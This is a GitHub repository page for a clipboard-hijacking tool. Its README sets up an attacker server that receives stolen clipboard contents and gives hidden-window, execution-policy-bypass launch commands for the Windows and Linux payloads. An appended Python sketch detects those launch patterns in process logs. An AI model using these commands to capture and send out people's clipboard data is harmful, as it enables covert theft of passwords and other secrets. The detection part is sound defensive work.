https://github.com/dev-0618/cp-jacker
Last synced: about 1 year ago
- Host: GitHub
- URL: https://github.com/dev-0618/cp-jacker
- Owner: Dev-0618
- Created: 2024-12-16T04:33:01.000Z (over 1 year ago)
- Default Branch: main
- Last Pushed: 2024-12-16T04:43:12.000Z (over 1 year ago)
- Last Synced: 2025-02-12T10:53:58.761Z (over 1 year ago)
- Language: PowerShell
- Size: 2.93 KB
- Stars: 1
- Watchers: 1
- Forks: 0
- Open Issues: 0
Metadata Files:
- Readme: README.md
README
# CP-Jacker
Clipboard Hijacker Tool

## Overview

This tool is designed for post-exploitation purposes in pentesting scenarios. It monitors and captures clipboard content on Windows and Linux systems, sending the collected data to an attacker-controlled server via HTTP POST requests.

The tool consists of:

- win-payload.ps1 for Windows
- linux-payload.ps1 for Linux

Both scripts require manual configuration of the server IP address generated by server.py before execution.
---
## How It Works

1. Run server.py:
   The Python server listens for clipboard data sent from the target systems.
2. Configure IP Address:
   Replace the server IP address in the first line of win-payload.ps1 and linux-payload.ps1 with the IP generated by server.py.
3. Execute the Payload:
   Run the PowerShell script on the target system to start capturing and sending clipboard data every 10 seconds.
---
## Setting Up the Server

1. Install Flask if not already installed:

   ```bash
   python3 -m pip install flask
   ```

2. Run the server:

   ```bash
   python3 server.py
   ```

3. The server will display an IP address (e.g., http://10.0.0.5:5000). Use this IP to replace the placeholder in both payload files.
---
## Manual IP Configuration

Open the payload file (win-payload.ps1 or linux-payload.ps1) in a text editor.

Update the first line with the correct server IP:

```powershell
$webhook_url = "http://:5000/clipboard_receiver"
```

Replace the placeholder with the actual IP displayed when running server.py.
---
## Execution Commands

### Windows Execution

Run the win-payload.ps1 script on the target machine:

```powershell
powershell -NoP -NonI -W Hidden -Exec Bypass .\win-payload.ps1
```

---

### Linux Execution

Run the linux-payload.ps1 script using PowerShell on Linux:

```bash
pwsh -NoProfile -NonInteractive -ExecutionPolicy Bypass -File ./linux-payload.ps1
```
---
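For defenders, the two launch commands above are the most stable artifact this tool leaves in process-creation logs. The following detection sketch is an added example, not part of the CP-Jacker repository: it normalizes abbreviated PowerShell switches (`-NoP`, `-W`, `-Exec`) before matching. The function names, the prefix table and the benign third sample line are assumptions made for illustration.

```python
import shlex

# Full parameter name -> shortest abbreviation accepted here. The minimums are
# an assumption about PowerShell's prefix matching; confirm for your versions.
PARAMS = {"noprofile": "nop", "noninteractive": "noni",
          "windowstyle": "w", "executionpolicy": "ex"}
HOSTS = {"powershell", "powershell.exe", "pwsh", "pwsh.exe"}

def canonical(token):
    """Map '-NoP', '/w', '-Exec' and similar to the full parameter name."""
    name = token[1:].lower() if token[:1] in ("-", "/") else ""
    name = "ex" if name == "ep" else name  # -ep is an alias of -ExecutionPolicy
    for full, shortest in PARAMS.items():
        if full.startswith(name) and name.startswith(shortest):
            return full
    return None

def analyze(cmdline):
    """Return the launch traits found in one process command line."""
    try:
        tokens = shlex.split(cmdline, posix=False)  # keeps Windows backslashes
    except ValueError:                              # unbalanced quotes
        tokens = cmdline.split()
    exe = tokens[0].strip('"').replace("\\", "/").rsplit("/", 1)[-1].lower() if tokens else ""
    if exe not in HOSTS:
        return set()
    traits = set()
    for i, tok in enumerate(tokens[1:], start=1):
        param = canonical(tok)
        value = tokens[i + 1].strip("'\"").lower() if i + 1 < len(tokens) else ""
        if param == "executionpolicy" and value == "bypass":
            traits.add("policy-bypass")
        elif param == "windowstyle" and value == "hidden":
            traits.add("hidden-window")
        elif param in ("noprofile", "noninteractive"):
            traits.add(param)
    return traits

def is_suspicious(cmdline):
    """Policy bypass combined with a hidden or non-interactive session."""
    t = analyze(cmdline)
    return "policy-bypass" in t and bool(t & {"hidden-window", "noninteractive"})

# Constructed sample log lines: the README's two commands plus one benign launch.
SAMPLES = [
    r"powershell -NoP -NonI -W Hidden -Exec Bypass .\win-payload.ps1",
    "pwsh -NoProfile -NonInteractive -ExecutionPolicy Bypass -File ./linux-payload.ps1",
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -File C:\scripts\inventory.ps1',
]
RESULTS = {s: is_suspicious(s) for s in SAMPLES}
```

Matching on normalized parameters rather than on the literal strings keeps the rule effective when the switches are spelled out, shortened differently, or reordered.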